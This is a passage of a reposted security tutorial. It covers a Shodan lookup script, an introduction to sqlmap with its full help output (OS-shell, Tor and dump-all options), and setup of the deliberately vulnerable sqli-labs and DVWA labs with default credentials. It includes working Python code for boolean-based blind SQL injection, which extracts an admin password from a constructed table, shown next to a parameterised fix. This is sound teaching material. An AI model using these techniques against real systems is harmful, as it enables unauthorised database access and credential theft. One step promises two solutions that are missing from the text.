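        print(f"{port:>6}/{transport}  {product} {version}")
    print("CPEs:", cpes(host))
    print("legacy SSH algorithms:", sorted(legacy_ssh_algorithms(host)))
```

Without arguments the script runs against the embedded sample; with an IP argument and SHODAN_API_KEY in the environment it fetches the live record, which has the same shape. Note that the SSH banner in the original output above also lists diffie-hellman-group14-sha1, hmac-sha1 and ssh-rsa, so the legacy-algorithm check is not hypothetical for that host.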

V. Introduction to sqlmap

1. What sqlmap is

sqlmap is an open-source penetration testing tool that automates the detection and exploitation of SQL injection flaws and the takeover of database servers.
It has a powerful detection engine, many niche features for the experienced penetration tester, and a broad range of switches, from database fingerprinting and fetching data from the database to accessing the underlying file system and executing commands on the operating system through out-of-band connections.

2. sqlmap features

  • Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB, Informix and other database management systems;
  • Full support for the boolean-based blind, time-based blind, error-based, UNION query-based and stacked queries injection techniques;
  • Direct connection to the database without going through a SQL injection point, given the database credentials, IP address, port and database name;
  • Enumeration of users, password hashes, privileges, roles, databases, tables and columns;
  • Automatic recognition of password hash formats and dictionary-based cracking of the hashes;
  • Dumping an entire database table, only a range of columns, or only a range of entries from one column, entirely at the user's choice;
  • Searching for specific database names, table names or column names across the DBMS.
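To make the technique list concrete, here is an added Python example (not sqlmap's code and not from the original post) against a constructed in-memory SQLite table: a vulnerable lookup next to its parameterised fix, a boolean-based blind oracle, and the binary-search extraction loop that sqlmap automates for technique B. The UNION payload in the test shows what --dump relies on when the column count lines up. Table name, rows and passwords are all made up for the example.

```python
import sqlite3
from typing import Callable, Optional


def build_db() -> sqlite3.Connection:
    """Constructed sample data: two users, one of them privileged."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "alice", "alice-pw"), (2, "admin", "Adm1n!Secret")])
    conn.commit()
    return conn


CONN = build_db()
Lookup = Callable[[str], Optional[str]]


def vulnerable_lookup(user_id: str) -> Optional[str]:
    """The classic bug: the parameter is pasted into the SQL text, so the
    client controls the query structure. This is the kind of endpoint that
    sqlmap's B (boolean), U (union) and E (error) tests are built for."""
    sql = "SELECT username FROM users WHERE id = " + user_id
    row = CONN.execute(sql).fetchone()
    return row[0] if row else None


def safe_lookup(user_id: str) -> Optional[str]:
    """Hardened version: validate the type, then bind the value as a
    parameter so the database never parses it as SQL."""
    if not user_id.isdigit():
        return None
    row = CONN.execute("SELECT username FROM users WHERE id = ?", (int(user_id),)).fetchone()
    return row[0] if row else None


def boolean_oracle(lookup: Lookup, base_id: str, condition: str) -> bool:
    """Boolean-based blind probe: the response differs depending on whether
    `condition` is true, although its value is never displayed."""
    return lookup(f"{base_id} AND ({condition})") is not None


def extract_char_blind(lookup: Lookup, base_id: str, target_sql: str, position: int) -> str:
    """Binary-search one character of a secret through the oracle: about
    seven requests per character instead of one per candidate value.
    target_sql must be a scalar subquery returning a single text value."""
    lo, hi = 32, 126                      # printable ASCII range
    while lo < hi:
        mid = (lo + hi) // 2
        probe = f"unicode(substr(({target_sql}), {position}, 1)) > {mid}"
        if boolean_oracle(lookup, base_id, probe):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo)


def extract_blind(lookup: Lookup, base_id: str, target_sql: str, max_len: int = 64) -> str:
    """Dump a whole value character by character, stopping when the oracle
    says the secret has no character at the next position. Against the
    hardened endpoint the very first probe fails and nothing comes back."""
    out = []
    for pos in range(1, max_len + 1):
        if not boolean_oracle(lookup, base_id, f"length(({target_sql})) >= {pos}"):
            break
        out.append(extract_char_blind(lookup, base_id, target_sql, pos))
    return "".join(out)


if __name__ == "__main__":
    secret = "SELECT password FROM users WHERE username='admin'"
    print("vulnerable:", extract_blind(vulnerable_lookup, "1", secret))
    print("hardened:  ", repr(extract_blind(safe_lookup, "1", secret)))
```

SQLite has no sleep() function, so the time-based variant (T) is not shown; the loop is the same with a conditional delay in place of the row/no-row difference. The validation in safe_lookup is what closes the hole: the binding alone would already stop the injection, the digit check additionally rejects junk before it reaches the database.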

3. Downloading and using sqlmap

Download it from the official site http://sqlmap.org/
(screenshot: http://sqlmap.org/)
Windows users can download the .zip file, Linux users the .tar.gz file.
The Windows build used here can also be downloaded from https://download.csdn.net/download/CUFEECR/12153600.
After extraction the directory contains the following files and folders:
(screenshot: extracted sqlmap directory)
Run the commands from inside that directory:

  • Show the help:
python sqlmap.py -h

Output:

        ___
       __H__
 ___ ___["]_____ ___ ___  {1.4.2.31#dev}
|_ -| . [,]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

Usage: sqlmap.py [options]

Options:
  -h, --help            Show basic help message and exit
  -hh                   Show advanced help message and exit
  --version             Show program's version number and exit
  -v VERBOSE            Verbosity level: 0-6 (default 1)

  Target:
    At least one of these options has to be provided to define the
    target(s)

    -u URL, --url=URL   Target URL (e.g. "http://www.site.com/vuln.php?id=1")
    -g GOOGLEDORK       Process Google dork results as target URLs

  Request:
    These options can be used to specify how to connect to the target URL

    --data=DATA         Data string to be sent through POST (e.g. "id=1")
    --cookie=COOKIE     HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
    --random-agent      Use randomly selected HTTP User-Agent header value
    --proxy=PROXY       Use a proxy to connect to the target URL
    --tor               Use Tor anonymity network
    --check-tor         Check to see if Tor is used properly

  Injection:
    These options can be used to specify which parameters to test for,
    provide custom injection payloads and optional tampering scripts

    -p TESTPARAMETER    Testable parameter(s)
    --dbms=DBMS         Force back-end DBMS to provided value

  Detection:
    These options can be used to customize the detection phase

    --level=LEVEL       Level of tests to perform (1-5, default 1)
    --risk=RISK         Risk of tests to perform (1-3, default 1)

  Techniques:
    These options can be used to tweak testing of specific SQL injection
    techniques

    --technique=TECH..  SQL injection techniques to use (default "BEUSTQ")

  Enumeration:
    These options can be used to enumerate the back-end database
    management system information, structure and data contained in the
    tables

    -a, --all           Retrieve everything
    -b, --banner        Retrieve DBMS banner
    --current-user      Retrieve DBMS current user
    --current-db        Retrieve DBMS current database
    --passwords         Enumerate DBMS users password hashes
    --tables            Enumerate DBMS database tables
    --columns           Enumerate DBMS database table columns
    --schema            Enumerate DBMS schema
    --dump              Dump DBMS database table entries
    --dump-all          Dump all DBMS databases tables entries
    -D DB               DBMS database to enumerate
    -T TBL              DBMS database table(s) to enumerate
    -C COL              DBMS database table column(s) to enumerate

  Operating system access:
    These options can be used to access the back-end database management
    system underlying operating system

    --os-shell          Prompt for an interactive operating system shell
    --os-pwn            Prompt for an OOB shell, Meterpreter or VNC

  General:
    These options can be used to set some general working parameters

    --batch             Never ask for user input, use the default behavior
    --flush-session     Flush session files for current target

  Miscellaneous:
    These options do not fit into any other category

    --sqlmap-shell      Prompt for an interactive sqlmap shell
    --wizard            Simple wizard interface for beginner users

[!] to see full list of options run with '-hh'

Press Enter to continue...
  • Show the version:
python sqlmap.py --version

Output:

1.4.2.31#dev

Press Enter to continue...

VI. Setting Up the Test Environment

1. Download and install phpStudy and start its services

phpStudy quickly sets up a local web stack and starts the related services.
Choose a suitable version at http://phpstudy.php.cn, download and install it.
After installation, start the Apache and MySQL services:
(screenshot: starting Apache and MySQL)
With Apache started in phpStudy, visiting 127.0.0.1 shows:
(screenshot: Apache default page)
which means the services are up.
Both labs installed below are deliberately vulnerable; keep them on a local or host-only network and never expose them to the Internet.

2. Installing sqli-labs

Copy the sqli-labs directory into the WWW directory under the phpStudy installation directory:
(screenshot: sqli-labs under WWW)
Then visit 127.0.0.1/sqli-labs, which shows:
(screenshot: sqli-labs index page)
Clicking Setup/reset Database for labs gives:
(screenshot: sqli-labs error page)
The page does not render correctly. Go to sql-connections under sqli-labs and edit db-creds.inc:

<?php

// give your mysql connection username n password
$dbuser = 'root';
$dbpass = 'root';
$dbname = "security";      // main lab database
$host = 'localhost';
$dbname1 = "challenges";   // database for the challenge levels

?>

Only the password needs changing: the default is root; if your MySQL password is different, set it accordingly.
Visiting http://127.0.0.1/sqli-labs/sql-connections/setup-db.php may still show the same page as before:
(screenshot: error page)
It still does not render. This is a PHP version incompatibility: sqli-labs uses the old mysql_xxx functions, which were removed in PHP 7 and replaced by the mysqli_xxx functions, and newer phpStudy releases run a PHP 7 build.
There are two solutions:

I used the second method, which worked for me; visiting http://127.0.0.1/sqli-labs/sql-connections/setup-db.php afterwards gives:
(screenshot: success page)
which means sqli-labs is configured.

3. Installing DVWA

The DVWA package can be downloaded from https://download.csdn.net/download/CUFEECR/12153780
As with sqli-labs, copy the DVWA directory into the WWW directory under the phpStudy installation directory, then visit 127.0.0.1/dvwa, which shows:
(screenshot: DVWA setup error)
Follow the instructions on that page:
rename config/config.inc.php.dist to config.inc.php (drop the .dist suffix) and edit the password line:

$_DVWA[ 'db_password' ] = 'root';

i.e. set it to the MySQL password, root here.
Reload the page; if it now shows
(screenshot: DVWA setup page)
the configuration is correct.
Click Create / Reset Database at the bottom left to create the database; after a few seconds the login page appears. The default username and password are admin / password.


Reposted from blog.csdn.net/CUFEECR/article/details/104279861